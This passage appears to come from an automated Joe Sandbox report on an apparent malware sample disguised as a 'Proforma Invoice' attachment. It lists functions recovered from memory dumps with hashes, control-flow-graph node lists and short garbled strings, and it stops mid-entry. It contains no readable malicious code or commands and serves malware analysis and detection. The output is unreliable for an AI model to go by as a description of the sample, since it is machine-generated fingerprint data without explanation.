                                                                                            • Instruction ID: 1aa26be5aade441d8228aa86f39407ff788cf48f227aeda7c63d13792a505d8d
                                                                                            • Opcode Fuzzy Hash: 3ab98204a0c93421398abaeb70d2e523bb1f91cfb6ba9061da887047972aadb8
                                                                                            • Instruction Fuzzy Hash: AB128C70A002199FDB14DF69C894BAEBBFAFF88304F108569E415AB395DF349D46CB90
                                                                                            Function 02693E09 Relevance: 2.8, Strings: 2, Instructions: 263COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 2372 2693e09-2693e25 2373 2693e2e-2693e3e 2372->2373 2374 2693e27-2693e29 2372->2374 2376 2693e40 2373->2376 2377 2693e45-2693e55 2373->2377 2375 26940cc-26940d3 2374->2375 2376->2375 2379 2693e5b-2693e69 2377->2379 2380 26940b3-26940c1 2377->2380 2384 26940d4-2694152 2379->2384 2385 2693e6f 2379->2385 2383 26940c3-26940c7 call 26902c8 2380->2383 2380->2384 2383->2375 2385->2384 2387 2693e8d-2693eae 2385->2387 2388 2693f4c-2693f6d 2385->2388 2389 2693fcc-2694009 2385->2389 2390 269400e-2694034 2385->2390 2391 2693f00-2693f21 2385->2391 2392 2694084-26940a5 call 26928f0 2385->2392 2393 2694067-2694082 call 26902d8 2385->2393 2394 26940a7-26940b1 2385->2394 2395 2693f26-2693f47 2385->2395 2396 2694039-2694065 2385->2396 2397 2693eda-2693efb 2385->2397 2398 2693f9f-2693fc7 2385->2398 2399 2693eb3-2693ed5 2385->2399 2400 2693f72-2693f9a 2385->2400 2401 2693e76-2693e88 2385->2401 2387->2375 2388->2375 2389->2375 2390->2375 2391->2375 2392->2375 2393->2375 2394->2375 2395->2375 2396->2375 2397->2375 2398->2375 2399->2375 2400->2375 2401->2375
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.4178436976.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_2690000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: Xbq$$^q
                                                                                            • API String ID: 0-1593437937
                                                                                            • Opcode ID: 321a9acc86e3fae14d0013699c66998399d6ac0f89a53ff2b3e3b8c5677b7014
                                                                                            • Instruction ID: 286b9c376656d89c6b3eb8f0354862bbd772d85f1c2ef06e84fa68b811a2a8b9
                                                                                            • Opcode Fuzzy Hash: 321a9acc86e3fae14d0013699c66998399d6ac0f89a53ff2b3e3b8c5677b7014
                                                                                            • Instruction Fuzzy Hash: B5919270F04259DBDF18ABB8946427E7BB7BFC8701B08896ED446E7388CE3498438795
                                                                                            Function 0269C147 Relevance: 2.7, Strings: 2, Instructions: 232COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 2534 269c147-269c158 2535 269c15a-269c170 2534->2535 2536 269c184 2534->2536 2540 269c171-269c172 2535->2540 2537 269c186-269c18a 2536->2537 2541 269c17b-269c17e 2540->2541 2542 269c174 2540->2542 2544 269c18b-269c199 2541->2544 2545 269c180-269c182 2541->2545 2543 269c175-269c178 2542->2543 2546 269c179 2543->2546 2544->2540 2548 269c19b-269c19d 2544->2548 2545->2535 2545->2536 2546->2537 2548->2543 2549 269c19f-269c1a1 2548->2549 2549->2546 2550 269c1a3-269c1c8 2549->2550 2551 269c1ca 2550->2551 2552 269c1cf-269c2ac call 26941a0 call 2693cc0 2550->2552 2551->2552 2562 269c2ae 2552->2562 2563 269c2b3-269c2d4 call 2695658 2552->2563 2562->2563 2565 269c2d9-269c2e4 2563->2565 2566 269c2eb-269c2ef 2565->2566 2567 269c2e6 2565->2567 2568 269c2f1-269c2f2 2566->2568 2569 269c2f4-269c2fb 2566->2569 2567->2566 2570 269c313-269c357 2568->2570 2571 269c2fd 2569->2571 2572 269c302-269c310 2569->2572 2576 269c3bd-269c3d4 2570->2576 2571->2572 2572->2570 2578 269c359-269c36f 2576->2578 2579 269c3d6-269c3fb 2576->2579 2583 269c399 2578->2583 2584 269c371-269c37d 2578->2584 2588 269c3fd-269c412 2579->2588 2589 269c413 2579->2589 2587 269c39f-269c3bc 2583->2587 2585 269c37f-269c385 2584->2585 2586 269c387-269c38d 2584->2586 2590 269c397 2585->2590 2586->2590 2587->2576 2588->2589 2590->2587
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.4178436976.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_2690000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: PH^q$PH^q
                                                                                            • API String ID: 0-1598597984
                                                                                            • Opcode ID: dc5822529a243ef9a0abf93ce5e1b9629f81806d2bf0602f75617630836795a5
                                                                                            • Instruction ID: 81690b77d337423fd88c1bf9bbabea953fc90b4136a6f55d96e2f50426147881
                                                                                            • Opcode Fuzzy Hash: dc5822529a243ef9a0abf93ce5e1b9629f81806d2bf0602f75617630836795a5
                                                                                            • Instruction Fuzzy Hash: F0A1FA74E01258DFDB14DFA9D884A9DBBF6BF89310F14806AE409EB365DB309886CF54
                                                                                            Function 02695362 Relevance: 2.7, Strings: 2, Instructions: 196COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 2594 2695362-2695364 2595 26953c4-2695484 call 26941a0 call 2693cc0 2594->2595 2596 2695366-26953a0 2594->2596 2608 269548b-26954a9 2595->2608 2609 2695486 2595->2609 2597 26953a2 2596->2597 2598 26953a7-26953c2 2596->2598 2597->2598 2598->2595 2639 26954ac call 2695649 2608->2639 2640 26954ac call 2695658 2608->2640 2609->2608 2610 26954b2-26954bd 2611 26954bf 2610->2611 2612 26954c4-26954c8 2610->2612 2611->2612 2613 26954ca-26954cb 2612->2613 2614 26954cd-26954d4 2612->2614 2615 26954ec-2695530 2613->2615 2616 26954db-26954e9 2614->2616 2617 26954d6 2614->2617 2621 2695596-26955ad 2615->2621 2616->2615 2617->2616 2623 26955af-26955d4 2621->2623 2624 2695532-2695548 2621->2624 2631 26955ec 2623->2631 2632 26955d6-26955eb 2623->2632 2628 269554a-2695556 2624->2628 2629 2695572 2624->2629 2633 2695558-269555e 2628->2633 2634 2695560-2695566 2628->2634 2630 2695578-2695595 2629->2630 2630->2621 2632->2631 2635 2695570 2633->2635 2634->2635 2635->2630 2639->2610 2640->2610
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.4178436976.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_2690000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: PH^q$PH^q
                                                                                            • API String ID: 0-1598597984
                                                                                            • Opcode ID: a6f2e8752181e7ffbdc4ee9af498eeb1fad82afbab9bc83fbba29818fe473a8e
                                                                                            • Instruction ID: bc3c2d9fc5151681b11f06318a45a6f5b395fc576073db8905c5760da408a09a
                                                                                            • Opcode Fuzzy Hash: a6f2e8752181e7ffbdc4ee9af498eeb1fad82afbab9bc83fbba29818fe473a8e
                                                                                            • Instruction Fuzzy Hash: B091C474E01258CFDF59DFA9D884A9DBBF2BF89300F149069E809AB365DB309985CF50
                                                                                            Function 0269CA58 Relevance: 2.7, Strings: 2, Instructions: 189COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 2641 269ca58-269ca88 2642 269ca8a 2641->2642 2643 269ca8f-269caee call 26941a0 2641->2643 2642->2643 2647 269caf3-269cb6c call 2693cc0 2643->2647 2653 269cb6e 2647->2653 2654 269cb73-269cba4 call 2695658 2647->2654 2653->2654 2657 269cbab-269cbaf 2654->2657 2658 269cba6 2654->2658 2659 269cbb1-269cbb2 2657->2659 2660 269cbb4-269cbbb 2657->2660 2658->2657 2663 269cbd3-269cc17 2659->2663 2661 269cbbd 2660->2661 2662 269cbc2-269cbd0 2660->2662 2661->2662 2662->2663 2667 269cc7d-269cc94 2663->2667 2669 269cc19-269cc2f 2667->2669 2670 269cc96-269ccbb 2667->2670 2674 269cc59 2669->2674 2675 269cc31-269cc3d 2669->2675 2677 269ccbd-269ccd2 2670->2677 2678 269ccd3 2670->2678 2676 269cc5f-269cc7c 2674->2676 2679 269cc3f-269cc45 2675->2679 2680 269cc47-269cc4d 2675->2680 2676->2667 2677->2678 2681 269cc57 2679->2681 2680->2681 2681->2676
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.4178436976.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_2690000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: PH^q$PH^q
                                                                                            • API String ID: 0-1598597984
                                                                                            • Opcode ID: 16c9f28f835c72fc8429ec32212c7527719ceb9c0b29ca26bfc203d7121fd460
                                                                                            • Instruction ID: d1eefcb42991abc6d27d2db90626c7a19894a2f75095a4252176455df73d937c
                                                                                            • Opcode Fuzzy Hash: 16c9f28f835c72fc8429ec32212c7527719ceb9c0b29ca26bfc203d7121fd460
                                                                                            • Instruction Fuzzy Hash: 4A81B674E01258CFDB18DFA9D984A9DBBF2BF88300F14C06AD819AB365DB349985CF50
                                                                                            Function 0269CFF7 Relevance: 2.7, Strings: 2, Instructions: 189COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 2729 269cff7-269d028 2730 269d02a 2729->2730 2731 269d02f-269d08e call 26941a0 2729->2731 2730->2731 2735 269d093-269d10c call 2693cc0 2731->2735 2741 269d10e 2735->2741 2742 269d113-269d144 call 2695658 2735->2742 2741->2742 2745 269d14b-269d14f 2742->2745 2746 269d146 2742->2746 2747 269d151-269d152 2745->2747 2748 269d154-269d15b 2745->2748 2746->2745 2749 269d173-269d1b7 2747->2749 2750 269d15d 2748->2750 2751 269d162-269d170 2748->2751 2755 269d21d-269d234 2749->2755 2750->2751 2751->2749 2757 269d1b9-269d1cf 2755->2757 2758 269d236-269d25b 2755->2758 2762 269d1f9 2757->2762 2763 269d1d1-269d1dd 2757->2763 2764 269d25d-269d272 2758->2764 2765 269d273 2758->2765 2768 269d1ff-269d21c 2762->2768 2766 269d1df-269d1e5 2763->2766 2767 269d1e7-269d1ed 2763->2767 2764->2765 2769 269d1f7 2766->2769 2767->2769 2768->2755 2769->2768
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.4178436976.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_2690000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: PH^q$PH^q
                                                                                            • API String ID: 0-1598597984
                                                                                            • Opcode ID: a315991c4581f00bbb748bd0ad1ab37596073d1800180af327097464b11b9f5a
                                                                                            • Instruction ID: 0308950b60db26e26ad9ecd87bb99c21164d098ebd3761c00b4e857527534700
                                                                                            • Opcode Fuzzy Hash: a315991c4581f00bbb748bd0ad1ab37596073d1800180af327097464b11b9f5a
                                                                                            • Instruction Fuzzy Hash: C581A474E01258DFDB18DFAAD884A9DBBF2BF88300F148069D419AB365DB319986CF50
                                                                                            Function 0269CD28 Relevance: 2.7, Strings: 2, Instructions: 189COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 2685 269cd28-269cd58 2686 269cd5a 2685->2686 2687 269cd5f-269ce3c call 26941a0 call 2693cc0 2685->2687 2686->2687 2697 269ce3e 2687->2697 2698 269ce43-269ce64 call 2695658 2687->2698 2697->2698 2700 269ce69-269ce74 2698->2700 2701 269ce7b-269ce7f 2700->2701 2702 269ce76 2700->2702 2703 269ce81-269ce82 2701->2703 2704 269ce84-269ce8b 2701->2704 2702->2701 2705 269cea3-269cee7 2703->2705 2706 269ce8d 2704->2706 2707 269ce92-269cea0 2704->2707 2711 269cf4d-269cf64 2705->2711 2706->2707 2707->2705 2713 269cee9-269ceff 2711->2713 2714 269cf66-269cf8b 2711->2714 2718 269cf29 2713->2718 2719 269cf01-269cf0d 2713->2719 2720 269cf8d-269cfa2 2714->2720 2721 269cfa3 2714->2721 2724 269cf2f-269cf4c 2718->2724 2722 269cf0f-269cf15 2719->2722 2723 269cf17-269cf1d 2719->2723 2720->2721 2725 269cf27 2722->2725 2723->2725 2724->2711 2725->2724
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.4178436976.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_2690000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: PH^q$PH^q
                                                                                            • API String ID: 0-1598597984
                                                                                            • Opcode ID: d176a4c104f2d25dceb91472f0b413bf326cb78814c08c5db5a1bf4d8db8396b
                                                                                            • Instruction ID: c7b568f27e8f13ffcba5a5773631f3e47c1d8a013ca25a5251fb6108674d9aad
                                                                                            • Opcode Fuzzy Hash: d176a4c104f2d25dceb91472f0b413bf326cb78814c08c5db5a1bf4d8db8396b
                                                                                            • Instruction Fuzzy Hash: 2E81B674E00258CFDB14DFA9D894A9DBBF6BF88300F14906AE419AB365DB309985CF50
                                                                                            Function 0269D2C9 Relevance: 2.7, Strings: 2, Instructions: 188COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.4178436976.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_2690000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: PH^q$PH^q
                                                                                            • API String ID: 0-1598597984
                                                                                            • Opcode ID: 4b3abd66e16cbb99f9658f732424a55974ff7b0e207ebdd0cc969304d79e580b
                                                                                            • Instruction ID: d14cd612cb50a3fd07fc3e6eef5d627dabaa5c59af7b0752a5302c6562f56599
                                                                                            • Opcode Fuzzy Hash: 4b3abd66e16cbb99f9658f732424a55974ff7b0e207ebdd0cc969304d79e580b
                                                                                            • Instruction Fuzzy Hash: 1681A774E01218DFDF18DFA9D984A9DBBF2BF89300F149069D419AB365DB309985CF50
                                                                                            Function 0269D599 Relevance: 2.7, Strings: 2, Instructions: 188COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.4178436976.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_2690000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: PH^q$PH^q
                                                                                            • API String ID: 0-1598597984
                                                                                            • Opcode ID: 935ce7ef8ed185a471f4f4a144c1be763b1b1ab7a7591980febd5f936af70284
                                                                                            • Instruction ID: 036a55df3957f7aae902cc026b3adbd7dda59e4b0d499232055ac61a320f2559
                                                                                            • Opcode Fuzzy Hash: 935ce7ef8ed185a471f4f4a144c1be763b1b1ab7a7591980febd5f936af70284
                                                                                            • Instruction Fuzzy Hash: 5481B674E01218CFDB14DFAAD984A9DBBF2BF88300F14D469E419AB365DB319985CF50
                                                                                            Function 0269C788 Relevance: 2.7, Strings: 2, Instructions: 185COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.4178436976.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_2690000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: PH^q$PH^q
                                                                                            • API String ID: 0-1598597984
                                                                                            • Opcode ID: 586bbfbd7f4f60daff21f14765a7cfe5ccfd4b23425469dcb3805e678f948b81
                                                                                            • Instruction ID: 927a5bedac3fef6ae85491203fb43affce9dd35052a8791f5d667a84f3a7f691
                                                                                            • Opcode Fuzzy Hash: 586bbfbd7f4f60daff21f14765a7cfe5ccfd4b23425469dcb3805e678f948b81
                                                                                            • Instruction Fuzzy Hash: 7181B574E01218CFDB14DFAAD984B9DBBF2BF88300F14806AE419AB365DB309985CF50
                                                                                            Function 06589328 Relevance: 2.0, APIs: 1, Instructions: 531COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.4194981319.0000000006580000.00000040.00000800.00020000.00000000.sdmp, Offset: 06580000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_6580000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b5eda5f80e03b356c98ed72c846a4c9de98f51ef869cf1630948141ed9fe12c5
                                                                                            • Instruction ID: ae4550787897011de9ce25d6a179c69673ac55e89e3899c6de6a5f4e22f85b51
                                                                                            • Opcode Fuzzy Hash: b5eda5f80e03b356c98ed72c846a4c9de98f51ef869cf1630948141ed9fe12c5
                                                                                            • Instruction Fuzzy Hash: E8223B74E01219CFDB54EFA9C884BADBBB2BF88300F1085A9E449AB355DB349D85CF50
                                                                                            Function 0269FBB6 Relevance: .2, Instructions: 204COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.4178436976.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_2690000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8c194e1131ed2fb32b451f45189661f5597fda8c03ec60e69f669274d18ee453
                                                                                            • Instruction ID: d422f92472ecfd42de077c5bfe55e214ce84a1cec821288790a3c49a0b7a0b4a
                                                                                            • Opcode Fuzzy Hash: 8c194e1131ed2fb32b451f45189661f5597fda8c03ec60e69f669274d18ee453
                                                                                            • Instruction Fuzzy Hash: B391E374E00218CFDB44DFA9D984AADBBB6FF88300F208569D419BB368DB359946CF50
                                                                                            Function 0269EA9B Relevance: .1, Instructions: 149COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.4178436976.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_2690000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7a3a9a081cc6faacd30c06b8b56cc00966f7fdbdd2d81636c7c982987d70d74b
                                                                                            • Instruction ID: 1dc906e39ec00c0bc8d9b58f1315288e12c3cff70d62df0d5f7b764a790e0e79
                                                                                            • Opcode Fuzzy Hash: 7a3a9a081cc6faacd30c06b8b56cc00966f7fdbdd2d81636c7c982987d70d74b
                                                                                            • Instruction Fuzzy Hash: 9551B874E01208DFDB18DFA9D584A9DBBB6FF88300F14806AE815BB365DB315846CF54
                                                                                            Function 0269EAA8 Relevance: .1, Instructions: 147COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.4178436976.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_2690000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 17f7a1bbb74053ec93182ecd410fec2a8d50a19032181a2999eeb99efe278650
                                                                                            • Instruction ID: c8adeca6d9f8bc463159bb6fd7080de08bf91224ee94ab69cd0dbba919cfd3a0
                                                                                            • Opcode Fuzzy Hash: 17f7a1bbb74053ec93182ecd410fec2a8d50a19032181a2999eeb99efe278650
                                                                                            • Instruction Fuzzy Hash: E851A574E01208DFDB18DFAAD584A9DBBF6BF88300F20806AE815AB364DB319945CF50
                                                                                            Function 026976F1 Relevance: 10.5, Strings: 8, Instructions: 457COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 0 26976f1-2697725 1 269772b-269774e 0->1 2 2697b54-2697b58 0->2 11 26977fc-2697800 1->11 12 2697754-2697761 1->12 3 2697b5a-2697b6e 2->3 4 2697b71-2697b7f 2->4 9 2697b81-2697b96 4->9 10 2697bf0-2697c05 4->10 18 2697b98-2697b9b 9->18 19 2697b9d-2697baa 9->19 20 2697c0c-2697c19 10->20 21 2697c07-2697c0a 10->21 15 2697848-2697851 11->15 16 2697802-2697810 11->16 24 2697770 12->24 25 2697763-269776e 12->25 22 2697c67 15->22 23 2697857-2697861 15->23 16->15 36 2697812-269782d 16->36 26 2697bac-2697bed 18->26 19->26 27 2697c1b-2697c56 20->27 21->27 30 2697c6c-2697c85 22->30 23->2 28 2697867-2697870 23->28 31 2697772-2697774 24->31 25->31 71 2697c5d-2697c64 27->71 34 269787f-269788b 28->34 35 2697872-2697877 28->35 31->11 38 269777a-26977dc 31->38 34->30 41 2697891-2697897 34->41 35->34 56 269783b 36->56 57 269782f-2697839 36->57 82 26977de 38->82 83 26977e2-26977f9 38->83 42 269789d-26978ad 41->42 43 2697b3e-2697b42 41->43 54 26978af-26978bf 42->54 55 26978c1-26978c3 42->55 43->22 46 2697b48-2697b4e 43->46 46->2 46->28 59 26978c6-26978cc 54->59 55->59 60 269783d-269783f 56->60 57->60 59->43 65 26978d2-26978e1 59->65 60->15 66 2697841 60->66 68 269798f-26979ba call 2697538 * 2 65->68 69 26978e7 65->69 66->15 88 26979c0-26979c4 68->88 89 2697aa4-2697abe 68->89 73 26978ea-26978fb 69->73 73->30 75 2697901-2697913 73->75 75->30 78 2697919-2697931 75->78 140 2697933 call 26980c9 78->140 141 2697933 call 26980d8 78->141 81 2697939-2697949 81->43 85 269794f-2697952 81->85 82->83 83->11 86 269795c-269795f 85->86 87 2697954-269795a 85->87 86->22 90 2697965-2697968 86->90 87->86 87->90 88->43 92 26979ca-26979ce 88->92 89->2 107 2697ac4-2697ac8 89->107 95 269796a-269796e 90->95 96 2697970-2697973 90->96 93 26979d0-26979dd 92->93 94 26979f6-26979fc 92->94 110 26979ec 93->110 111 26979df-26979ea 93->111 99 26979fe-2697a02 94->99 100 2697a37-2697a3d 94->100 95->96 98 2697979-269797d 95->98 96->22 96->98 98->22 105 2697983-2697989 98->105 99->100 106 2697a04-2697a0d 99->106 102 2697a49-2697a4f 100->102 103 2697a3f-2697a43 100->103 108 2697a5b-2697a5d 102->108 109 2697a51-2697a55 102->109 103->71 103->102 105->68 105->73 112 2697a1c-2697a32 106->112 113 2697a0f-2697a14 106->113 114 2697aca-2697ad4 call 26963e0 107->114 115 2697b04-2697b08 107->115 116 2697a5f-2697a68 108->116 117 2697a92-2697a94 108->117 109->43 109->108 118 26979ee-26979f0 110->118 111->118 112->43 113->112 114->115 128 2697ad6-2697aeb 114->128 115->71 119 2697b0e-2697b12 115->119 122 2697a6a-2697a6f 116->122 123 2697a77-2697a8d 116->123 117->43 124 2697a9a-2697aa1 117->124 118->43 118->94 119->71 126 2697b18-2697b25 119->126 122->123 123->43 131 2697b34 126->131 132 2697b27-2697b32 126->132 128->115 137 2697aed-2697b02 128->137 134 2697b36-2697b38 131->134 132->134 134->43 134->71 137->2 137->115 140->81 141->81
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.4178436976.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_2690000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (o^q$(o^q$(o^q$(o^q$(o^q$(o^q$,bq$,bq
                                                                                            • API String ID: 0-1932283790
                                                                                            • Opcode ID: d5fc39293ecb790f1cb705f812447e3c183a0f9ef0473444117efcb65e82f8e3
                                                                                            • Instruction ID: e419eb23fba2d82cfab12260ef81f3e1baed227cadc758ad7e4f86ef9510e590
                                                                                            • Opcode Fuzzy Hash: d5fc39293ecb790f1cb705f812447e3c183a0f9ef0473444117efcb65e82f8e3
                                                                                            • Instruction Fuzzy Hash: FF122570A10209CFCF26CF69D984AAEBBF6FF88314F1485A9E4159B365DB31E941CB50
                                                                                            Function 0269AEF0 Relevance: 3.9, Strings: 3, Instructions: 154COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1521 269aef0-269aef1 1522 269aec9-269aecb 1521->1522 1523 269aef3-269aef5 1521->1523 1524 269aecd 1522->1524 1523->1524 1525 269aef7-269aef9 1523->1525 1527 269aed1 1524->1527 1526 269aefb-269af40 1525->1526 1525->1527 1535 269af53-269af5e 1526->1535 1536 269af42-269af4d 1526->1536 1528 269aebb-269aec6 1527->1528 1529 269aed2-269aed9 1527->1529 1528->1522 1533 269aedb-269aedd 1529->1533 1534 269aedf-269aee3 1529->1534 1537 269aee9-269aeea 1533->1537 1534->1537 1541 269b02f 1535->1541 1542 269af64-269afc1 1535->1542 1536->1535 1540 269afd6-269b028 1536->1540 1554 269b029 1540->1554 1543 269b031-269b051 1541->1543 1549 269afca-269afd3 1542->1549 1543->1554 1555 269b053-269b059 1543->1555 1554->1541 1555->1543 1556 269b05b-269b06b 1555->1556 1558 269b072-269b074 1556->1558 1559 269b06d call 2697c88 1556->1559 1560 269b085-269b093 1558->1560 1561 269b076-269b083 1558->1561 1559->1558 1567 269b0a1 1560->1567 1568 269b095-269b09f 1560->1568 1566 269b0a3-269b0a6 1561->1566 1567->1566 1568->1566
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.4178436976.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_2690000_Proforma Invoice_21-1541 And Packing List.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (o^q$(o^q$3
                                                                                            • API String ID: 0-1458047847
                                                                                            • Opcode ID: 18f829a6220249cb4c01888690dfe480934c6b363e23b854180e88e832ae0446
                                                                                            • Instruction ID: 7762546a85bc2f20f9008677db331b7a307771a6eac4718073fb7d31ca01a744
                                                                                            • Opcode Fuzzy Hash: 18f829a6220249cb4c01888690dfe480934c6b363e23b854180e88e832ae0446
                                                                                            • Instruction Fuzzy Hash: 0C41E732B042448FDB149B68E8586AE7BFAFBC8351F14406AE516D7391DF319C02CB95
                                                                                            Function 02695F38 Relevance: 2.8, Strings: 2, Instructions: 323COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
